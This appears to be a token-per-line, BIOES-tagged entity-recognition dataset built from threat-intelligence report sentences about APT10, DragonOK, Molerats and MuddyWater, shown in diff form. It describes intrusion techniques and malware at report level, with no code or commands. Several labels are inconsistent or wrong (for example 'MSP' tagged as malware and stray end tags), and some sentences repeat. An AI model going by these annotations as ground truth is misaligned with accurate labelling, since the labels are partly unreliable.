+cloud O
+hosting O
+, O
+supporting O
+our O
+assessment O
+that O
+APT10 S-APT
+are O
+almost O
+certainly O
+targeting O
+MSPs S-IDTY
+. O
+
+The O
+13th O
+FYP O
+was O
+released O
+in O
+March B-TIME
+2016 E-TIME
+and O
+the O
+sectors O
+and O
+organisations O
+known O
+to O
+be O
+targeted O
+by O
+APT10 S-APT
+are O
+broadly O
+in O
+line O
+with O
+the O
+strategic O
+aims O
+documented O
+in O
+this O
+plan O
+. O
+These O
+aims O
+outlined O
+in O
+the O
+FYP O
+will O
+largely O
+dictate O
+the O
+growth O
+of O
+businesses S-IDTY
+in O
+China S-LOC
+and O
+are O
+, O
+therefore O
+, O
+likely O
+to O
+also O
+form O
+part O
+of O
+Chinese S-LOC
+companies S-IDTY
+' O
+business O
+strategies O
+. O
+
+APT10 S-APT
+has O
+, O
+in O
+the O
+past O
+, O
+primarily O
+been O
+known O
+for O
+its O
+targeting O
+of O
+government S-IDTY
+and O
+US S-LOC
+defence O
+industrial O
+base O
+organisations O
+, O
+with O
+the O
+earliest O
+known O
+date O
+of O
+its O
+activity O
+being O
+in O
+December B-TIME
+2009 E-TIME
+. O
+
+Observed O
+APT10 S-APT
+targeting O
+is O
+in O
+line O
+with O
+many O
+of O
+the O
+historic O
+compromises O
+we O
+have O
+outlined O
+previously O
+as O
+originating O
+from O
+China S-LOC
+. O
+
+In O
+line O
+with O
+commonly O
+used O
+APT B-APT
+actor E-APT
+methodologies O
+, O
+the O
+threat O
+actor O
+aligns O
+its O
+decoy B-MAL
+documents E-MAL
+to O
+a O
+topic O
+of O
+interest O
+relevant O
+to O
+the O
+recipient O
+. O
+
+This O
+section O
+details O
+changes O
+made O
+to O
+APT10 S-APT
+tools O
+, O
+techniques O
+and O
+procedures O
+( O
+TTPs O
+) O
+post-2014 S-TIME
+, O
+following O
+its O
+shift O
+from O
+Poison B-MAL
+Ivy E-MAL
+to O
+PlugX S-MAL
+. O
+
+We O
+have O
+observed O
+that O
+in O
+cases O
+where O
+APT10 S-APT
+has O
+infiltrated O
+a O
+target O
+via O
+an O
+MSP S-MAL
+, O
+it O
+continues O
+to O
+use O
+the O
+MSPs S-IDTY
+credentials O
+. O
+
+In O
+order O
+to O
+gain O
+any O
+further O
+credentials O
+, O
+APT10 S-APT
+will O
+usually O
+deploy O
+credential O
+theft O
+tools O
+such O
+as O
+mimikatz S-MAL
+or O
+PwDump S-MAL
+, O
+sometimes O
+using O
+DLL B-MAL
+load I-MAL
+order I-MAL
+hijacking E-MAL
+, O
+to O
+use O
+against O
+a O
+domain O
+controller O
+, O
+explained O
+further O
+in O
+Annex O
+B O
+. O
+
+APT10 S-APT
+achieves O
+persistence O
+on O
+its O
+targets O
+primarily O
+by O
+using O
+scheduled B-MAL
+tasks E-MAL
+or O
+Windows B-MAL
+services E-MAL
+in O
+order O
+to O
+ensure O
+the O
+malware O
+remains O
+active O
+regardless O
+of O
+system O
+reboots O
+. O
+
+For O
+example O
+, O
+in O
+addition O
+to O
+compromising O
+high O
+value O
+domain O
+controllers O
+and O
+security O
+servers O
+, O
+the O
+threat O
+actor O
+has O
+also O
+been O
+observed O
+identifying O
+and O
+subsequently O
+installing O
+malware O
+on O
+low O
+profile O
+systems O
+that O
+provide O
+non-critical O
+support O
+functions O
+to O
+the O
+business O
+, O
+and O
+are O
+thus O
+less O
+likely O
+to O
+draw O
+the O
+attention O
+of O
+system O
+administrators O
+. O
+
+In O
+the O
+majority O
+of O
+instances O
+APT10 S-APT
+used O
+either O
+a O
+reverse B-MAL
+shell E-MAL
+or O
+RDP S-MAL
+connection O
+to O
+install O
+its O
+malware O
+; O
+the O
+actor S-APT
+also O
+uses O
+these O
+methods O
+to O
+propagate O
+across O
+the O
+network O
+. O
+
+The O
+tactical O
+malware O
+, O
+historically O
+EvilGrab S-MAL
+, O
+and O
+now O
+ChChes S-MAL
+( O
+and O
+likely O
+also O
+RedLeaves S-MAL
+) O
+, O
+is O
+designed O
+to O
+be O
+lightweight O
+and O
+disposable O
+, O
+often O
+being O
+delivered O
+through O
+spear B-ACT
+phishing E-ACT
+. O
+
+Once O
+executed O
+, O
+tactical O
+malware O
+contains O
+the O
+capability O
+to O
+profile O
+the O
+network S-IDTY
+and O
+manoeuvre O
+through O
+it O
+to O
+identify O
+a O
+key O
+system O
+of O
+interest O
+. O
+
+We O
+have O
+also O
+observed O
+APT10 S-APT
+use O
+DLL B-ACT
+search I-ACT
+order I-ACT
+hijacking I-ACT
+and I-ACT
+sideloading E-ACT
+, O
+to O
+execute O
+some O
+modified O
+versions O
+of O
+open-source O
+tools O
+. O
+
+For O
+example O
+, O
+PwC B-SECTEAM
+UK E-SECTEAM
+has O
+observed O
+APT10 S-APT
+compiling O
+DLLs O
+out O
+of O
+tools O
+, O
+such O
+as O
+Mimikatz S-MAL
+and O
+PwDump6 S-MAL
+, O
+and O
+using O
+legitimate O
+, O
+signed B-MAL
+software E-MAL
+, O
+such O
+as O
+Windows S-OS
+Defender O
+to O
+load O
+the O
+malicious O
+payloads O
+. O
+
+During O
+our O
+analysis O
+of O
+victim O
+networks O
+, O
+we O
+were O
+able O
+to O
+observe O
+APT10 S-APT
+once O
+again O
+initiate O
+a O
+retooling O
+cycle O
+in O
+late B-TIME
+2016 E-TIME
+. O
+
+We O
+observed O
+the O
+deployment O
+and O
+testing O
+of O
+multiple O
+versions O
+of O
+Quasar S-MAL
+malware S-MAL
+, O
+and O
+the O
+introduction O
+of O
+the O
+bespoke O
+malware O
+families O
+ChChes S-MAL
+and O
+RedLeaves S-MAL
+. O
+
+APT10 S-APT
+is O
+a O
+constantly O
+evolving O
+, O
+highly O
+persistent O
+China-based S-LOC
+threat O
+actor O
+that O
+has O
+an O
+ambitious O
+and O
+unprecedented O
+collection O
+programme O
+against O
+a O
+broad O
+spectrum O
+of O
+sectors O
+, O
+enabled O
+by O
+its O
+strategic O
+targeting O
+. O
+
+Since O
+exposure O
+of O
+its O
+operations O
+in O
+2013 S-TIME
+, O
+APT10 S-APT
+has O
+made O
+a O
+number O
+of O
+significant O
+changes O
+intended O
+to O
+thwart O
+detection O
+of O
+its O
+campaigns S-ACT
+. O
+
+PwC B-SECTEAM
+UK E-SECTEAM
+and O
+BAE B-SECTEAM
+Systems E-SECTEAM
+, O
+working O
+closely O
+with O
+industry S-IDTY
+and O
+government S-IDTY
+, O
+have O
+uncovered O
+a O
+new O
+, O
+unparallelled O
+campaign O
+which O
+we O
+refer O
+to O
+as O
+Operation B-ACT
+Cloud I-ACT
+Hopper E-ACT
+. O
+
+This O
+operation O
+has O
+targeted O
+managed B-IDTY
+IT I-IDTY
+service I-IDTY
+providers E-IDTY
+, O
+the O
+compromise O
+of O
+which O
+provides O
+APT10 S-APT
+with O
+potential O
+access O
+to O
+thousands O
+of O
+further O
+victims O
+. O
+
+An O
+additional O
+campaign O
+has O
+also O
+been O
+observed O
+targeting O
+Japanese S-LOC
+entities O
+. O
+
+APT10 S-APT
+'s O
+malware O
+toolbox O
+shows O
+a O
+clear O
+evolution O
+from O
+malware O
+commonly O
+associated O
+with O
+China-based S-LOC
+threat O
+actors S-APT
+towards O
+bespoke O
+in-house O
+malware O
+that O
+has O
+been O
+used O
+in O
+more O
+recent O
+campaigns S-ACT
+; O
+this O
+is O
+indicative O
+of O
+APT10 S-APT
+'s O
+increasing O
+sophistication O
+, O
+which O
+is O
+highly O
+likely O
+to O
+continue O
+. O
+
+The O
+threat O
+actor O
+'s O
+known O
+working O
+hours O
+align O
+to O
+Chinese S-LOC
+Standard O
+TIME O
+( O
+CST O
+) O
+and O
+its O
+targeting O
+corresponds O
+to O
+that O
+of O
+other O
+known O
+China-based S-LOC
+threat O
+actors S-APT
+, O
+which O
+supports O
+our O
+assessment O
+that O
+these O
+campaigns S-ACT
+are O
+conducted O
+by O
+APT10 S-APT
+. O
+
+APT10 S-APT
+( O
+MenuPass B-APT
+Group E-APT
+) O
+is O
+a O
+Chinese S-LOC
+cyber B-ACT
+espionage I-ACT
+group O
+that O
+FireEye S-SECTEAM
+has O
+tracked O
+since O
+2009 S-TIME
+. O
+
+Its O
+targets O
+include O
+the O
+military B-IDTY
+organizations E-IDTY
+and O
+governments S-IDTY
+of O
+countries O
+with O
+national O
+interests O
+in O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+, O
+including O
+some O
+within O
+the O
+U.S. S-LOC
+defense B-IDTY
+industrial I-IDTY
+base E-IDTY
+. O
+
+Moafee S-APT
+may O
+have O
+chosen O
+its O
+targets O
+based O
+on O
+the O
+rich O
+resources O
+of O
+South B-LOC
+China I-LOC
+Sea E-LOC
+region O
+– O
+the O
+world O
+'s O
+second O
+business O
+sea-lane O
+, O
+according O
+to O
+Wikipedia O
+– O
+including O
+rare O
+earth O
+metals O
+, O
+crude O
+oil S-IDTY
+, O
+and O
+natural O
+gas S-IDTY
+. O
+
+DragonOK S-APT
+appears O
+to O
+operate O
+out O
+of O
+China S-LOC
+'s O
+Jiangsu B-LOC
+Province E-LOC
+. O
+
+Moafee S-APT
+and O
+DragonOK S-APT
+both O
+use O
+a O
+well-known O
+proxy O
+tool O
+– O
+HUC B-MAL
+Packet I-MAL
+Transmit I-MAL
+MAL E-MAL
+( O
+HTRAN S-MAL
+) O
+– O
+to O
+disguise O
+their O
+geographical O
+locations O
+. O
+
+However O
+, O
+FireEye S-SECTEAM
+researchers O
+do O
+not O
+have O
+enough O
+insight O
+to O
+reliably O
+report O
+a O
+definitive O
+connection O
+to O
+the O
+Moafee S-APT
+and O
+DragonOK B-APT
+groups E-APT
+. O
+
+Both O
+Moafee S-APT
+and O
+DragonOK S-APT
+favor O
+spear-phishing S-ACT
+emails S-TOOL
+as O
+an O
+attack O
+vector O
+, O
+often O
+employing O
+a O
+decoy O
+to O
+deceive O
+the O
+victim O
+. O
+
+Attachments S-FILE
+are O
+typically O
+sent O
+as O
+an O
+executable O
+file O
+embedded O
+in O
+a O
+ZIP B-ACT
+archive E-ACT
+or O
+a O
+password-protected B-ACT
+Microsoft I-ACT
+Office I-ACT
+document E-ACT
+. O
+
+We O
+observed O
+Moafee S-APT
+running O
+HTRAN S-MAL
+proxies O
+on O
+their O
+multiple O
+Command O
+and O
+Control O
+( O
+C2 S-TOOL
+) O
+servers O
+– O
+all O
+operated O
+on O
+CHINANET O
+, O
+and O
+hosted O
+in O
+Guangdong B-LOC
+Province E-LOC
+. O
+
+Like O
+the O
+Moafee B-APT
+group E-APT
+, O
+we O
+observed O
+DragonOK S-APT
+running O
+HTRAN S-MAL
+to O
+proxy O
+their O
+C2 S-TOOL
+servers O
+, O
+which O
+are O
+also O
+operated O
+on O
+CHINANET O
+but O
+are O
+hosted O
+in O
+the O
+Jiangsu B-LOC
+Province E-LOC
+. O
+
+Primarily O
+focused O
+on O
+governments S-IDTY
+and O
+military O
+operations O
+of O
+countries O
+with O
+interests O
+in O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+, O
+Moafee S-APT
+likely O
+chooses O
+its O
+targets O
+based O
+on O
+region O
+'s O
+rich O
+natural O
+resources O
+. O
+
+By O
+targeting O
+high-tech S-IDTY
+and O
+manufacturing S-IDTY
+operations O
+in O
+Japan S-LOC
+and O
+Taiwan S-LOC
+, O
+DragonOK S-APT
+may O
+be O
+acquiring O
+trade O
+secrets O
+for O
+a O
+competitive O
+economic S-IDTY
+advantage O
+. O
+
+Security O
+researchers O
+subsequently O
+linked O
+these O
+attacks O
+to O
+a O
+broader O
+, O
+yearlong O
+campaign O
+that O
+targeted O
+not O
+just O
+Israelis S-LOC
+but O
+Palestinians O
+as O
+well O
+. O
+
+and O
+as O
+discovered O
+later O
+, O
+even O
+the O
+U.S. S-LOC
+and O
+UK S-LOC
+governments S-IDTY
+. O
+
+The O
+second O
+group O
+, O
+known O
+as O
+DragonOK S-APT
+, O
+targets O
+high-tech S-IDTY
+and O
+manufacturing B-IDTY
+companies E-IDTY
+in O
+Japan S-LOC
+and O
+Taiwan S-LOC
+. O
+
+In O
+2012 S-TIME
+, O
+the O
+Molerats B-ACT
+attacks E-ACT
+appeared O
+to O
+rely O
+heavily O
+on O
+the O
+XtremeRAT S-MAL
+, O
+a O
+freely O
+available O
+tool O
+that O
+is O
+popular O
+with O
+attackers S-APT
+based O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+But O
+the O
+group O
+has O
+also O
+used O
+Poison B-MAL
+Ivy E-MAL
+( O
+PIVY S-MAL
+) O
+, O
+a O
+RAT S-MAL
+more O
+commonly O
+associated O
+with O
+threat O
+actors S-APT
+in O
+China S-LOC
+— O
+so O
+much O
+so O
+that O
+PIVY S-MAL
+has O
+, O
+inaccurately O
+, O
+become O
+synonymous O
+with O
+all O
+APT B-ACT
+attacks E-ACT
+linked O
+to O
+China S-LOC
+. O
+
+This O
+blog O
+post O
+analyzes O
+several O
+recent O
+Molerats B-ACT
+attacks E-ACT
+that O
+deployed O
+PIVY S-MAL
+against O
+targets O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+in O
+the O
+U.S. S-LOC
+We O
+also O
+examine O
+additional O
+PIVY B-ACT
+attacks E-ACT
+that O
+leverage O
+Arabic-language O
+content O
+related O
+to O
+the O
+ongoing O
+crisis O
+in O
+Egypt S-LOC
+and O
+the O
+wider O
+Middle B-LOC
+East E-LOC
+to O
+lure O
+targets O
+into O
+opening O
+malicious B-FILE
+files E-FILE
+. O
+
+We O
+do O
+not O
+know O
+whether O
+using O
+PIVY S-MAL
+is O
+an O
+attempt O
+by O
+those O
+behind O
+the O
+Molerats B-ACT
+campaign E-ACT
+to O
+frame O
+China-based S-LOC
+threat O
+actors S-APT
+for O
+their O
+attacks O
+or O
+simply O
+evidence O
+that O
+they O
+have O
+added O
+another O
+effective O
+, O
+publicly-available O
+RAT S-MAL
+to O
+its O
+arsenal O
+. O
+
+We O
+observed O
+several O
+attacks O
+in O
+June S-TIME
+and O
+July B-TIME
+2013 E-TIME
+against O
+targets O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+the O
+U.S. S-LOC
+that O
+dropped O
+a O
+PIVY S-MAL
+payload O
+that O
+connected O
+to O
+command-and-control S-TOOL
+( O
+CnC S-TOOL
+) O
+infrastructure O
+used O
+by O
+the O
+Molerats S-APT
+attackers S-APT
+. O
+
+The O
+archive O
+contains O
+an O
+.exe B-FILE
+file E-FILE
+, O
+sometimes O
+disguised O
+as O
+a O
+Microsoft B-FILE
+Word I-FILE
+file E-FILE
+, O
+a O
+video O
+, O
+or O
+another O
+file O
+format O
+, O
+using O
+the O
+corresponding O
+icon O
+. O
+
+In O
+addition O
+to O
+DustySky S-MAL
+, O
+the O
+attackers S-APT
+use O
+publicly B-MAL
+available I-MAL
+tools E-MAL
+such O
+as O
+the O
+following O
+Remote B-MAL
+Administration I-MAL
+Tools E-MAL
+( O
+RAT S-MAL
+) O
+: O
+Poison B-MAL
+Ivy E-MAL
+, O
+Nano B-MAL
+Core E-MAL
+, O
+XtremeRAT S-MAL
+, O
+DarkComet S-MAL
+and O
+Spy-Net S-MAL
+. O
+
+DustySky S-MAL
+( O
+called O
+" O
+NeD B-MAL
+Worm E-MAL
+" O
+by O
+its O
+developer O
+) O
+is O
+a O
+multi-stage O
+malware O
+in O
+use O
+since O
+May B-TIME
+2015 E-TIME
+. O
+
+It O
+is O
+in O
+use O
+by O
+the O
+Molerats S-APT
+( O
+aka O
+Gaza B-APT
+cybergang E-APT
+) O
+, O
+a O
+politically S-IDTY
+motivated O
+group O
+whose O
+main O
+objective O
+, O
+we O
+believe O
+, O
+is O
+intelligence O
+gathering O
+. O
+
+Operating O
+since O
+2012 S-TIME
+, O
+the O
+Molerats B-APT
+group E-APT
+'s O
+activity O
+has O
+been O
+reported O
+by O
+Norman S-SECTEAM
+, O
+Kaspersky S-SECTEAM
+, O
+FireEye S-SECTEAM
+, O
+and O
+PwC S-SECTEAM
+. O
+
+DustySky S-MAL
+has O
+been O
+developed O
+and O
+used O
+since O
+May B-TIME
+2015 E-TIME
+by O
+Molerats S-APT
+( O
+aka O
+" O
+Gaza B-APT
+cybergang E-APT
+" O
+) O
+, O
+a O
+terrorist O
+group O
+whose O
+main O
+objective O
+in O
+this O
+campaign O
+is O
+intelligence O
+gathering O
+. O
+
+Most O
+targets O
+are O
+from O
+the O
+Middle B-LOC
+East E-LOC
+: O
+Israel S-LOC
+, O
+Egypt S-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+and O
+Iraq S-LOC
+. O
+
+The O
+United B-LOC
+States E-LOC
+and O
+countries O
+in O
+Europe S-LOC
+are O
+targeted O
+as O
+well O
+. O
+
+The O
+sample O
+analyzed O
+is O
+f589827c4cf94662544066b80bfda6ab O
+from O
+late B-TIME
+August I-TIME
+2015 E-TIME
+. O
+
+The O
+MuddyWater B-ACT
+attacks E-ACT
+are O
+primarily O
+against O
+Middle B-LOC
+Eastern E-LOC
+nations O
+. O
+
+However O
+, O
+we O
+have O
+also O
+observed O
+attacks O
+against O
+surrounding O
+nations O
+and O
+beyond O
+, O
+including O
+targets O
+in O
+India S-LOC
+and O
+the O
+USA S-LOC
+. O
+
+Targeted O
+sectors O
+of O
+Molerats S-APT
+include O
+governmental S-IDTY
+and O
+diplomatic I-IDTY
+institutions E-IDTY
+, O
+including O
+embassies S-IDTY
+; O
+companies O
+from O
+the O
+aerospace S-IDTY
+and O
+defence B-IDTY
+Industries E-IDTY
+; O
+financial B-IDTY
+institutions E-IDTY
+; O
+journalists S-IDTY
+; O
+software B-IDTY
+developers E-IDTY
+. O
+
+The O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks I-SECTEAM
+Unit I-SECTEAM
+42 E-SECTEAM
+research O
+team O
+recently O
+came O
+across O
+a O
+series O
+of O
+malicious B-FILE
+files E-FILE
+which O
+were O
+almost O
+identical O
+to O
+those O
+targeting O
+the O
+Saudi B-LOC
+Arabian E-LOC
+government S-IDTY
+previously O
+discussed O
+by O
+MalwareBytes S-SECTEAM
+. O
+
+MuddyWater B-ACT
+attacks E-ACT
+are O
+characterized O
+by O
+the O
+use O
+of O
+a O
+slowly O
+evolving O
+PowerShell-based B-MAL
+first I-MAL
+stage I-MAL
+backdoor E-MAL
+we O
+call O
+" O
+POWERSTATS S-MAL
+" O
+. O
+
+When O
+we O
+looked O
+at O
+the O
+cluster O
+of O
+activity O
+which O
+consisted O
+of O
+what O
+appeared O
+to O
+be O
+espionage-focused B-ACT
+attacks E-ACT
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+we O
+were O
+somewhat O
+confused O
+as O
+the O
+previous O
+public O
+reporting O
+had O
+attributed O
+these O
+attacks O
+to O
+FIN7 S-APT
+. O
+
+FIN7 S-APT
+is O
+a O
+threat O
+actor O
+group O
+that O
+is O
+financially O
+motivated O
+with O
+targets O
+in O
+the O
+restaurant S-IDTY
+, O
+services S-IDTY
+and O
+financial B-IDTY
+sectors E-IDTY
+. O
+
+Following O
+the O
+trail O
+of O
+existing O
+public O
+reporting O
+, O
+the O
+tie O
+to O
+FIN7 S-APT
+is O
+essentially O
+made O
+based O
+on O
+a O
+download O
+observed O
+from O
+a O
+MuddyWater B-MAL
+C2 E-MAL
+, O
+of O
+a O
+non-public B-MAL
+tool E-MAL
+" O
+DNSMessenger S-MAL
+" O
+. O
+
+There O
+was O
+a O
+mistake O
+in O
+the O
+original O
+Morphisec S-SECTEAM
+analysis O
+which O
+linked O
+these O
+attacks O
+to O
+FIN7 S-APT
+. O
+
+The O
+DNSMessenger S-MAL
+malware S-MAL
+is O
+a O
+shared O
+tool O
+, O
+used O
+by O
+FIN7 S-APT
+, O
+MuddyWater S-APT
+and O
+perhaps O
+other O
+groups S-APT
+. O
+
+In O
+September B-TIME
+2018 E-TIME
+, O
+we O
+found O
+evidence O
+of O
+Seedworm S-APT
+and O
+the O
+espionage S-ACT
+group O
+APT28 S-APT
+( O
+aka O
+Swallowtail S-APT
+, O
+Fancy B-APT
+Bear E-APT
+) O
+, O
+on O
+a O
+computer O
+within O
+the O
+Brazil-based S-LOC
+embassy S-IDTY
+of O
+an O
+oil-producing O
+nation O
+. O
+
+We O
+found O
+new O
+variants O
+of O
+the O
+Powermud B-MAL
+backdoor E-MAL
+, O
+a O
+new O
+backdoor O
+( O
+Backdoor.Powemuddy S-MAL
+) O
+, O
+and O
+custom B-MAL
+tools E-MAL
+for O
+stealing O
+passwords O
+, O
+creating O
+reverse O
+shells O
+, O
+privilege O
+escalation O
+, O
+and O
+the O
+use O
+of O
+the O
+native O
+Windows S-OS
+cabinet O
+creation O
+tool O
+, O
+makecab.exe S-FILE
+, O
+probably O
+for O
+compressing O
+stolen O
+data O
+to O
+be O
+uploaded O
+. O
+
+Seedworm S-APT
+likely O
+functions O
+as O
+a O
+cyber B-ACT
+espionage I-ACT
+group O
+to O
+secure O
+actionable O
+intelligence O
+that O
+could O
+benefit O
+their O
+sponsor O
+'s O
+interests O
+. O
+
+During O
+the O
+operations O
+, O
+the O
+group O
+used O
+tools O
+consistent O
+with O
+those O
+leveraged O
+during O
+past O
+intrusions O
+including O
+Powermud S-MAL
+, O
+a O
+custom O
+tool O
+used O
+by O
+the O
+Seedworm B-APT
+group E-APT
+, O
+and O
+customized B-MAL
+PowerShell E-MAL
+, O
+LaZagne S-MAL
+, O
+and O
+Crackmapexec B-MAL
+scripts E-MAL
+. O
+
+The O
+Seedworm B-APT
+group E-APT
+controls O
+its O
+Powermud B-MAL
+backdoor E-MAL
+from O
+behind O
+a O
+proxy O
+network O
+to O
+hide O
+the O
+ultimate O
+command-and-control S-TOOL
+( O
+C&C S-TOOL
+) O
+location O
+. O
+
+After O
+compromising O
+a O
+system O
+, O
+typically O
+by O
+installing O
+Powermud S-MAL
+or O
+Powemuddy S-MAL
+, O
+Seedworm S-APT
+first O
+runs O
+a O
+tool O
+that O
+steals O
+passwords O
+saved O
+in O
+users O
+' O
+web B-ACT
+browsers E-ACT
+and O
+email S-ACT
+, O
+demonstrating S-ACT
+that O
+access O
+to O
+the O
+victim O
+'s O
+email S-TOOL
+, O
+social O
+media O
+, O
+and O
+chat O
+accounts O
+is O
+one O
+of O
+their O
+likely O
+goals O
+. O
+
+Seedworm S-APT
+then O
+uses O
+open-source O
+tools O
+such O
+as O
+LaZagne S-MAL
+and O
+Crackmapexec S-MAL
+to O
+obtain O
+Windows S-OS
+authorization O
+credentials O
+. O
+
+The O
+group O
+, O
+which O
+we O
+call O
+Seedworm S-APT
+( O
+aka O
+MuddyWater S-APT
+) O
+, O
+has O
+been O
+operating O
+since O
+at O
+least O
+2017 S-TIME
+, O
+with O
+its O
+most O
+recent O
+activity O
+observed O
+in O
+December B-TIME
+2018 E-TIME
+. O
+
+The O
+Seedworm B-APT
+group E-APT
+is O
+the O
+only O
+group O
+known O
+to O
+use O
+the O
+Powermud B-MAL
+backdoor E-MAL
+. O
+
+Additionally O
+, O
+the O
+group O
+compromised O
+organizations O
+in O
+Europe S-LOC
+and O
+North B-LOC
+America E-LOC
+that O
+have O
+ties O
+to O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+MuddyWater S-APT
+is O
+an O
+Iranian S-LOC
+high-profile O
+threat O
+actor O
+that O
+'s O
+been O
+seen O
+active O
+since O
+2017 S-TIME
+. O
+
+Little O
+detail O
+is O
+given O
+on O
+the O
+nature O
+of O
+how O
+the O
+connection O
+between O
+DNSMessenger S-MAL
+and O
+MuddyWater S-MAL
+was O
+discovered O
+it O
+isn't O
+possible O
+for O
+us O
+to O
+verify O
+this O
+link O
+. O
+
+Over O
+the O
+past O
+year O
+, O
+we've O
+seen O
+the O
+group O
+extensively O
+targeting O
+a O
+wide O
+gamut O
+of O
+entities O
+in O
+various O
+sectors O
+, O
+including O
+Governments S-IDTY
+, O
+Academy S-IDTY
+, O
+Crypto-Currency S-IDTY
+, O
+Telecommunications S-IDTY
+and O
+the O
+Oil B-IDTY
+sectors E-IDTY
+. O
+
+Little O
+detail O
+is O
+given O
+on O
+the O
+nature O
+of O
+how O
+the O
+connection O
+between O
+DNSMessenger S-MAL
+and O
+MuddyWater S-MAL
+was O
+discovered O
+it O
+isn't O
+possible O
+for O
+us O
+to O
+verify O
+this O
+link O
+. O
+
+Depending O
+on O
+each O
+sample O
+, O
+the O
+content O
+of O
+document O
+is O
+either O
+a O
+fake B-MAL
+resume I-MAL
+application E-MAL
+, O
+or O
+a O
+letter S-MAL
+from O
+the O
+Ministry O
+of O
+Justice O
+in O
+Lebanon S-LOC
+or O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+Analysts O
+in O
+our O
+DeepSight B-SECTEAM
+Managed I-SECTEAM
+Adversary I-SECTEAM
+and I-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+( O
+MATI S-SECTEAM
+) O
+team O
+have O
+found O
+a O
+new O
+backdoor O
+, O
+Backdoor.Powemuddy S-FILE
+, O
+new O
+variants O
+of O
+Seedworm S-APT
+'s O
+Powermud B-FILE
+backdoor E-FILE
+( O
+aka O
+POWERSTATS S-MAL
+) O
+, O
+a O
+GitHub O
+repository O
+used O
+by O
+the O
+group O
+to O
+store O
+their O
+scripts O
+, O
+as O
+well O
+as O
+several O
+post-compromise O
+tools O
+the O
+group O
+uses O
+to O
+exploit S-VULNAME
+victims O
+once O
+they O
+have O
+established O
+a O
+foothold O
+in O
+their O
+network O
+. O
+
+From O
+January B-TIME
+2018 E-TIME
+to O
+March B-TIME
+2018 E-TIME
+, O
+through O
+FireEye B-SECTEAM
+'s I-SECTEAM
+Dynamic I-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+, O
+we O
+observed O
+attackers S-APT
+leveraging O
+the O
+latest O
+code O
+execution O
+and O
+persistence O
+techniques O
+to O
+distribute O
+malicious O
+macro-based O
+documents O
+to O
+individuals O
+in O
+Asia S-LOC
+and O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+MuddyWater S-APT
+has O
+engaged O
+in O
+prolific O
+spear B-ACT
+phishing E-ACT
+of O
+government E-IDTY
+and O
+defense B-IDTY
+entities E-IDTY
+in O
+Central S-LOC
+and O
+Southwest B-LOC
+Asia E-LOC
+. O
+
+This O
+actor S-APT
+has O
+engaged O
+in O
+prolific O
+spear B-ACT
+phishing E-ACT
+of O
+government E-IDTY
+and O
+defense B-IDTY
+entities E-IDTY
+in O
+Central S-LOC
+and O
+Southwest B-LOC
+Asia E-LOC
+. O
+
+When O
+successfully O
+executed O
+, O
+the O
+malicious O
+documents O
+install O
+a O
+backdoor S-MAL
+we O
+track O
+as O
+POWERSTATS S-MAL
+. O
+
+The O
+group O
+is O
+known O
+for O
+espionage B-ACT
+campaigns E-ACT
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+The O
+threat O
+group O
+in O
+this O
+recently O
+observed O
+campaign O
+– O
+TEMP.Zagros O
+– O
+weaponized O
+their O
+malware O
+using O
+the O
+following O
+techniques O
+. O
+
+The O
+MuddyWater B-ACT
+campaign E-ACT
+was O
+first O
+sighted O
+in O
+2017 S-TIME
+when O
+it O
+targeted O
+the O
+Saudi S-LOC
+government S-IDTY
+using O
+an O
+attack O
+involving O
+PowerShell B-MAL
+scripts E-MAL
+deployed O
+via O
+Microsoft S-MAL
+Office B-MAL
+Word E-MAL
+macro O
+. O
+
+The O
+threat O
+group O
+in O
+this O
+recently O
+observed O
+campaign O
+a O
+TEMP.Zagros O
+a O
+weaponized O
+their O
+malware O
+using O
+the O
+following O
+techniques O
+. O
+
+Like O
+the O
+previous O
+campaigns S-ACT
+, O
+these O
+samples O
+again O
+involve O
+a O
+Microsoft B-TOOL
+Word E-TOOL
+document O
+embedded O
+with O
+a O
+malicious O
+macro O
+that O
+is O
+capable O
+of O
+executing O
+PowerShell S-TOOL
+( O
+PS S-TOOL
+) O
+scripts O
+leading O
+to O
+a O
+backdoor O
+payload O
+. O
+
+MuddyWater S-APT
+is O
+a O
+relatively O
+new O
+APT O
+that O
+surfaced O
+in O
+2017 S-TIME
+. O
+
+We O
+attribute O
+this O
+activity O
+to O
+TEMP.Zagros S-APT
+( O
+reported O
+by O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+and O
+Trend B-SECTEAM
+Micro E-SECTEAM
+as O
+MuddyWater S-APT
+) O
+, O
+an O
+Iran-nexus S-LOC
+actor S-APT
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+May B-TIME
+2017 E-TIME
+. O
+
+We O
+attribute O
+this O
+activity O
+to O
+TEMP.Zagros S-APT
+( O
+reported O
+by O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+and O
+Trend B-SECTEAM
+Micro E-SECTEAM
+) O
+, O
+an O
+Iran-nexus S-LOC
+actor S-APT
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+May B-TIME
+2017 E-TIME
+. O
+
+Entities O
+in O
+these O
+sectors O
+are O
+often O
+" O
+enabling O
+victims O
+" O
+as O
+telecommunications B-IDTY
+providers E-IDTY
+or O
+IT B-IDTY
+services I-IDTY
+agencies E-IDTY
+and O
+vendors O
+could O
+provide O
+Seedworm B-APT
+actors E-APT
+with O
+further O
+victims O
+to O
+compromise O
+. O
+
+The O
+group O
+mainly O
+targets O
+the O
+telecommunications S-IDTY
+and O
+IT B-IDTY
+services I-IDTY
+sectors E-IDTY
+. O
+
+However O
+, O
+the O
+group O
+behind O
+MuddyWater S-APT
+has O
+been O
+known O
+to O
+target O
+other O
+countries O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+Europe S-LOC
+and O
+the O
+US S-LOC
+. O
+
+The O
+group O
+has O
+focused O
+mainly O
+on O
+governmental S-IDTY
